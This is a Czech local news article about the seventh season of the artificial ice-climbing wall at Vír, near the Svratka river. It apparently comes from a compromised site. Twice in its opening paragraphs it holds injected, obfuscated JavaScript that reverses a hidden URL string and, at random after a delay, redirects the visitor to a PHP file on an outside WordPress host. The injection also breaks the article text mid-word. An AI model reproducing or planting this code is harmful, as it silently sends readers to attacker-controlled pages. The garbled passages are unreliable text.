Vír, vir, aktuality, stěna, ledová
Rainbow page separator

Vírská ledová stěna zahájila sedmou sezonu

Pondělí, 21. ledna 2013

Vír / Me["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}todickým dnem Českého horolezeckého svazu začala už sedmá sezona na ledové stěně ve Víru na Bystřicku. Tu za příznivých klimatických podmínek každou zimu zprovozňuje sdružení adrenalinových spor["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovců Adrex - za mrazů stříkají vodu na čtyřicet metrů vysokou skálu na břehu řeky Svratky pod hrází Vírské přehrady.

Výsledkem je největší ledopád v České republice a jedna z nejvyšších uměle vytvořených ledových stěn v Evropě. Kromě zkušených lezců si stěnu mohou vyzkoušet i úplní začátečníci. Lezení po ledové skále je na vlastní nebezpečí, provozovatelé z Adrexu ovšem každého lezce jistí, součástí je i úvodní instruktáž.

Zájemcům o ledové lezení je doporučováno vlastní horolezecké vybavení – cepíny, mačky, přilba a horolezecký úvaz. Na místě sice je půjčovna, ale v případě velkého zájmu z řad veřejnosti by vybavení nemuselo pro všechny lezce stačit.

Nejbližší velká akce, která se na vírské ledové stěně odehraje, se koná o víkendu 2. a 3. února. Jde o již tradiční Adrex Ice Run 2013 – závod v lezení na čas.